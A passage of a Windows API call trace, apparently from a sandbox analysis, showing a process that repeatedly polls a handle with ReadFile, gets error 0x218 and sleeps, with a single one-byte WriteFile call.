	[0192.411] Sleep (dwMilliseconds=0xa) 
	[0192.426] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.427] GetLastError () returned 0x218
	[0192.427] Sleep (dwMilliseconds=0xa) 
	[0192.443] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.443] GetLastError () returned 0x218
	[0192.443] Sleep (dwMilliseconds=0xa) 
	[0192.458] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.458] GetLastError () returned 0x218
	[0192.458] Sleep (dwMilliseconds=0xa) 
	[0192.525] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.525] GetLastError () returned 0x218
	[0192.525] Sleep (dwMilliseconds=0xa) 
	[0192.567] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.567] GetLastError () returned 0x218
	[0192.567] Sleep (dwMilliseconds=0xa) 
	[0192.614] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.614] GetLastError () returned 0x218
	[0192.614] Sleep (dwMilliseconds=0xa) 
	[0192.661] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.661] GetLastError () returned 0x218
	[0192.661] Sleep (dwMilliseconds=0xa) 
	[0192.707] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.707] GetLastError () returned 0x218
	[0192.707] Sleep (dwMilliseconds=0xa) 
	[0193.297] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0193.297] GetLastError () returned 0x218
	[0193.297] Sleep (dwMilliseconds=0xa) 
	[0193.784] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0193.784] GetLastError () returned 0x218
	[0193.784] Sleep (dwMilliseconds=0xa) 
	[0193.909] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0193.909] GetLastError () returned 0x218
	[0193.909] Sleep (dwMilliseconds=0xa) 
	[0193.956] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0193.956] GetLastError () returned 0x218
	[0193.956] Sleep (dwMilliseconds=0xa) 
	[0194.019] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.019] GetLastError () returned 0x218
	[0194.019] Sleep (dwMilliseconds=0xa) 
	[0194.065] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.065] GetLastError () returned 0x218
	[0194.065] Sleep (dwMilliseconds=0xa) 
	[0194.082] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.082] GetLastError () returned 0x218
	[0194.082] Sleep (dwMilliseconds=0xa) 
	[0194.104] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.104] GetLastError () returned 0x218
	[0194.104] Sleep (dwMilliseconds=0xa) 
	[0194.112] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.112] GetLastError () returned 0x218
	[0194.112] Sleep (dwMilliseconds=0xa) 
	[0194.127] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.127] GetLastError () returned 0x218
	[0194.127] Sleep (dwMilliseconds=0xa) 
	[0194.143] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.143] GetLastError () returned 0x218
	[0194.143] Sleep (dwMilliseconds=0xa) 
	[0194.158] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.158] GetLastError () returned 0x218
	[0194.158] Sleep (dwMilliseconds=0xa) 
	[0194.174] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.174] GetLastError () returned 0x218
	[0194.175] Sleep (dwMilliseconds=0xa) 
	[0194.189] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.189] GetLastError () returned 0x218
	[0194.189] Sleep (dwMilliseconds=0xa) 
	[0194.237] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.237] GetLastError () returned 0x218
	[0194.237] Sleep (dwMilliseconds=0xa) 
	[0194.298] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.298] GetLastError () returned 0x218
	[0194.299] Sleep (dwMilliseconds=0xa) 
	[0194.323] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.323] GetLastError () returned 0x218
	[0194.323] Sleep (dwMilliseconds=0xa) 
	[0194.330] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.330] GetLastError () returned 0x218
	[0194.330] Sleep (dwMilliseconds=0xa) 
	[0194.346] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.346] GetLastError () returned 0x218
	[0194.346] Sleep (dwMilliseconds=0xa) 
	[0194.361] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.361] GetLastError () returned 0x218
	[0194.361] Sleep (dwMilliseconds=0xa) 
	[0194.377] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.377] GetLastError () returned 0x218
	[0194.377] Sleep (dwMilliseconds=0xa) 
	[0194.392] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.392] GetLastError () returned 0x218
	[0194.393] Sleep (dwMilliseconds=0xa) 
	[0194.408] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.408] GetLastError () returned 0x218
	[0194.408] Sleep (dwMilliseconds=0xa) 
	[0194.423] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.424] GetLastError () returned 0x218
	[0194.424] Sleep (dwMilliseconds=0xa) 
	[0194.470] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.470] GetLastError () returned 0x218
	[0194.470] Sleep (dwMilliseconds=0xa) 
	[0194.525] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.525] GetLastError () returned 0x218
	[0194.525] Sleep (dwMilliseconds=0xa) 
	[0194.535] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.535] GetLastError () returned 0x218
	[0194.535] Sleep (dwMilliseconds=0xa) 
	[0194.548] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.548] GetLastError () returned 0x218
	[0194.548] Sleep (dwMilliseconds=0xa) 
	[0194.566] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.566] GetLastError () returned 0x218
	[0194.566] Sleep (dwMilliseconds=0xa) 
	[0194.579] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.580] GetLastError () returned 0x218
	[0194.580] Sleep (dwMilliseconds=0xa) 
	[0194.596] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.596] GetLastError () returned 0x218
	[0194.596] Sleep (dwMilliseconds=0xa) 
	[0194.611] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.611] GetLastError () returned 0x218
	[0194.611] Sleep (dwMilliseconds=0xa) 
	[0194.632] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.632] GetLastError () returned 0x218
	[0194.632] Sleep (dwMilliseconds=0xa) 
	[0194.642] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.642] GetLastError () returned 0x218
	[0194.643] Sleep (dwMilliseconds=0xa) 
	[0194.689] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.689] GetLastError () returned 0x218
	[0194.689] Sleep (dwMilliseconds=0xa) 
	[0194.729] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.729] GetLastError () returned 0x218
	[0194.729] Sleep (dwMilliseconds=0xa) 
	[0194.754] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.754] GetLastError () returned 0x218
	[0194.754] Sleep (dwMilliseconds=0xa) 
	[0194.766] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.766] GetLastError () returned 0x218
	[0194.767] Sleep (dwMilliseconds=0xa) 
	[0194.782] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.782] GetLastError () returned 0x218
	[0194.782] Sleep (dwMilliseconds=0xa) 
	[0194.798] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.798] GetLastError () returned 0x218
	[0194.798] Sleep (dwMilliseconds=0xa) 
	[0194.814] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.814] GetLastError () returned 0x218
	[0194.814] Sleep (dwMilliseconds=0xa) 
	[0194.829] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.829] GetLastError () returned 0x218
	[0194.829] Sleep (dwMilliseconds=0xa) 
	[0194.845] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.845] GetLastError () returned 0x218
	[0194.845] Sleep (dwMilliseconds=0xa) 
	[0194.860] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.860] GetLastError () returned 0x218
	[0194.860] Sleep (dwMilliseconds=0xa) 
	[0194.907] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.907] GetLastError () returned 0x218
	[0194.907] Sleep (dwMilliseconds=0xa) 
	[0194.955] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0194.955] GetLastError () returned 0x218
	[0194.955] Sleep (dwMilliseconds=0x3e8) 
	[0195.976] WriteFile (in: hFile=0x240, lpBuffer=0x108f208, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0) returned 0
	[0195.977] Sleep (dwMilliseconds=0xa) 
	[0195.999] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0195.999] GetLastError () returned 0x218
	[0195.999] Sleep (dwMilliseconds=0xa) 
	[0196.051] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0196.051] GetLastError () returned 0x218
	[0196.051] Sleep (dwMilliseconds=0xa) 
	[0196.135] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0196.135] GetLastError () returned 0x218
	[0196.135] Sleep (dwMilliseconds=0xa) 
	[0196.176] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0196.176] GetLastError () returned 0x218
	[0196.176] Sleep (dwMilliseconds=0xa) 
	[0196.195] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0196.195] GetLastError () returned 0x218
	[0196.195] Sleep (dwMilliseconds=0xa) 
	[0196.209] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0196.209] GetLastError () returned 0x218
	[0196.209] Sleep (dwMilliseconds=0xa) 
	[0196.233] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0196.233] GetLastError () returned 0x218
	[0196.233] Sleep (dwMilliseconds=0xa) 
	[0196.268] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0196.268] GetLastError () returned 0x218
	[0196.268] Sleep (dwMilliseconds=0xa) 
	[0196.326] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0196.326] GetLastError () returned 0x218
	[0196.326] Sleep (dwMilliseconds=0xa) 
	[0196.420] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0196.420] GetLastError () returned 0x218
	[0196.420] Sleep (dwMilliseconds=0xa) 
	[0196.446] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0196.446] GetLastError () returned 0x218
	[0196.446] Sleep (dwMilliseconds=0xa) 
	[0196.464] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0196.464] GetLastError () returned 0x218
	[0196.464] Sleep (dwMilliseconds=0xa) 
	[0196.479] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0196.479] GetLastError () returned 0x218
	[0196.479] Sleep (dwMilliseconds=0xa) 
	[0196.498] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0196.498] GetLastError () returned 0x218
	[0196.498] Sleep (dwMilliseconds=0xa) 
	[0196.545] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0196.545] GetLastError () returned 0x218
	[0196.545] Sleep (dwMilliseconds=0xa) 
	[0196.598] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0196.598] GetLastError () returned 0x218
	[0196.598] Sleep (dwMilliseconds=0xa) 
	[0196.672] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0196.672] GetLastError () returned 0x218
	[0196.672] Sleep (dwMilliseconds=0xa) 
	[0196.700] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0196.700] GetLastError () returned 0x218
	[0196.700] Sleep (dwMilliseconds=0xa) 
	[0196.717] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0196.717] GetLastError () returned 0x218
	[0196.717] Sleep (dwMilliseconds=0xa) 
	[0196.734] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0196.734] GetLastError () returned 0x218
	[0196.734] Sleep (dwMilliseconds=0xa) 
	[0196.752] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0196.752] GetLastError () returned 0x218
	[0196.752] Sleep (dwMilliseconds=0xa) 
	[0196.769] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0196.769] GetLastError () returned 0x218
	[0196.769] Sleep (dwMilliseconds=0xa) 
	[0196.787] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0196.787] GetLastError () returned 0x218
	[0196.787] Sleep (dwMilliseconds=0xa) 
	[0196.843] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0196.843] GetLastError () returned 0x218
	[0196.843] Sleep (dwMilliseconds=0xa) 
	[0196.930] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
